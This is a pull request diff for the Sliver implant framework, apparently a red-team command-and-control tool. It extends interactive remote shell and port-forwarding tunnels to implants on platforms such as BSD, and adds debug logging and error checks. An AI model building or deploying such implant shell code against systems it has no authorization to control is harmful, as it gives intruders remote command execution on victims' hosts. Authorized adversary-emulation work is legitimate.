### PR TITLE
Default Shell

### DIFF
--- a/client/command/shell.go
+++ b/client/command/shell.go
@@ -38,6 +38,8 @@ import (
 
 const (
 	windows = "windows"
+	darwin  = "darwin"
+	linux   = "linux"
 )
 
 func shell(ctx *grumble.Context, rpc rpcpb.SliverRPCClient) {
@@ -52,8 +54,8 @@ func shell(ctx *grumble.Context, rpc rpcpb.SliverRPCClient) {
 
 	shellPath := ctx.Flags.String("shell-path")
 	noPty := ctx.Flags.Bool("no-pty")
-	if ActiveSession.Get().OS == windows {
-		noPty = true // Windows of course doesn't have PTYs
+	if ActiveSession.Get().OS != linux && ActiveSession.Get().OS != darwin {
+		noPty = true // Sliver's PTYs are only supported on linux/darwin
 	}
 	runInteractive(ctx, shellPath, noPty, rpc)
 	fmt.Println("Shell exited")

--- a/implant/sliver/handlers/handlers_default.go
+++ b/implant/sliver/handlers/handlers_default.go
@@ -59,11 +59,6 @@ func GetSystemPivotHandlers() map[uint32]PivotHandler {
 	return map[uint32]PivotHandler{}
 }
 
-// GetTunnelHandlers - Not supported
-func GetTunnelHandlers() map[uint32]TunnelHandler {
-	return map[uint32]TunnelHandler{}
-}
-
 // GetPivotHandlers - Not supported
 func GetPivotHandlers() map[uint32]PivotHandler {
 	return map[uint32]PivotHandler{}

--- a/implant/sliver/handlers/tun-handlers.go
+++ b/implant/sliver/handlers/tun-handlers.go
@@ -1,5 +1,3 @@
-// +build windows linux darwin
-
 package handlers
 
 /*

--- a/implant/sliver/handlers/tun-handlers.go
+++ b/implant/sliver/handlers/tun-handlers.go
@@ -56,6 +56,9 @@ var (
 
 // GetTunnelHandlers - Returns a map of tunnel handlers
 func GetTunnelHandlers() map[uint32]TunnelHandler {
+	// {{if .Config.Debug}}
+	log.Printf("[tunnel] Tunnel handlers %v", tunnelHandlers)
+	// {{end}}
 	return tunnelHandlers
 }
 
@@ -193,10 +196,19 @@ func shellReqHandler(envelope *sliverpb.Envelope, connection *transports.Connect
 
 	shellPath := shell.GetSystemShellPath(shellReq.Path)
 	systemShell := shell.StartInteractive(shellReq.TunnelID, shellPath, shellReq.EnablePTY)
+	if systemShell == nil {
+		// {{if .Config.Debug}}
+		log.Printf("[shell] Failed to get system shell")
+		// {{end}}
+		return
+	}
 	go systemShell.StartAndWait()
 	// Wait for the process to actually spawn
 	for {
 		if systemShell.Command.Process == nil {
+			// {{if .Config.Debug}}
+			log.Printf("[shell] Waiting for process to spawn ...")
+			// {{end}}
 			time.Sleep(time.Second)
 		} else {
 			break

--- a/implant/sliver/shell/shell_default.go
+++ b/implant/sliver/shell/shell_default.go
@@ -61,9 +61,20 @@ func pipedShell(tunnelID uint64, command []string) *Shell {
 	var cmd *exec.Cmd
 	cmd = exec.Command(command[0], command[1:]...)
 
-	stdin, _ := cmd.StdinPipe()
-	stdout, _ := cmd.StdoutPipe()
-	// cmd.Start()
+	stdin, err := cmd.StdinPipe()
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("[shell] stdin pipe failed\n")
+		// {{end}}
+		return nil
+	}
+	stdout, err := cmd.StdoutPipe()
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("[shell] stdout pipe failed\n")
+		// {{end}}
+		return nil
+	}
 
 	return &Shell{
 		ID:      tunnelID,

--- a/implant/sliver/shell/shell_default.go
+++ b/implant/sliver/shell/shell_default.go
@@ -1,0 +1,102 @@
+// +build !windows !linux !darwin
+package shell
+
+/*
+	Sliver Implant Framework
+	Copyright (C) 2021  Bishop Fox
+
+	This program is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	This program is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with this program.  If not, see <https://www.gnu.org/licenses/>.
+*/
+
+import (
+	"io"
+	// {{if .Config.Debug}}
+	"log"
+	// {{end}}
+	"os"
+	"os/exec"
+)
+
+var (
+	// Shell constants
+	bash = []string{"/bin/bash"}
+	sh   = []string{"/bin/sh"}
+)
+
+// Shell - Struct to hold shell related data
+type Shell struct {
+	ID      uint64
+	Command *exec.Cmd
+	Stdout  io.ReadCloser
+	Stdin   io.WriteCloser
+}
+
+// Start - Start a process
+func Start(command string) error {
+	cmd := exec.Command(command)
+	return cmd.Start()
+}
+
+// StartInteractive - Start a shell
+func StartInteractive(tunnelID uint64, command []string, enablePty bool) *Shell {
+	return pipedShell(tunnelID, command)
+}
+
+func pipedShell(tunnelID uint64, command []string) *Shell {
+	// {{if .Config.Debug}}
+	log.Printf("[shell] %s", command)
+	// {{end}}
+
+	var cmd *exec.Cmd
+	cmd = exec.Command(command[0], command[1:]...)
+
+	stdin, _ := cmd.StdinPipe()
+	stdout, _ := cmd.StdoutPipe()
+	// cmd.Start()
+
+	return &Shell{
+		ID:      tunnelID,
+		Command: cmd,
+		Stdout:  stdout,
+		Stdin:   stdin,
+	}
+}
+
+// GetSystemShellPath - Find bash or sh
+func GetSystemShellPath(path string) []string {
+	if exists(path) {
+		return []string{path}
+	}
+	if exists(bash[0]) {
+		return bash
+	}
+	return sh
+}
+
+// StartAndWait starts a system shell then waits for it to complete
+func (s *Shell) StartAndWait() {
+	s.Command.Start()
+	s.Command.Wait()
+}
+
+func exists(path string) bool {
+	_, err := os.Stat(path)
+	if err == nil {
+		return true
+	}
+	if os.IsNotExist(err) {
+		return false
+	}
+	return true
+}

--- a/protobuf/clientpb/client.proto
+++ b/protobuf/clientpb/client.proto
@@ -304,9 +304,9 @@ message MSFRemoteReq {
 }
 
 enum StageProtocol {
-    TCP = 0;
-    HTTP = 1;
-    HTTPS = 2;
+  TCP = 0;
+  HTTP = 1;
+  HTTPS = 2;
 }
 
 message StagerListenerReq {

--- a/server/generate/srcfiles.go
+++ b/server/generate/srcfiles.go
@@ -175,7 +175,10 @@ var (
 		"encoders/images.go",
 
 		"handlers/handlers_default.go",
+		"handlers/tun-handlers.go",
 		"handlers/handlers.go",
+
+		"shell/shell_default.go",
 
 		"hostuuid/uuid_default.go",
 


### PR DESCRIPTION
This patch enables the use of `shell` and `portfwd` in default implant builds (aka unsupported platforms like BSD, etc.)
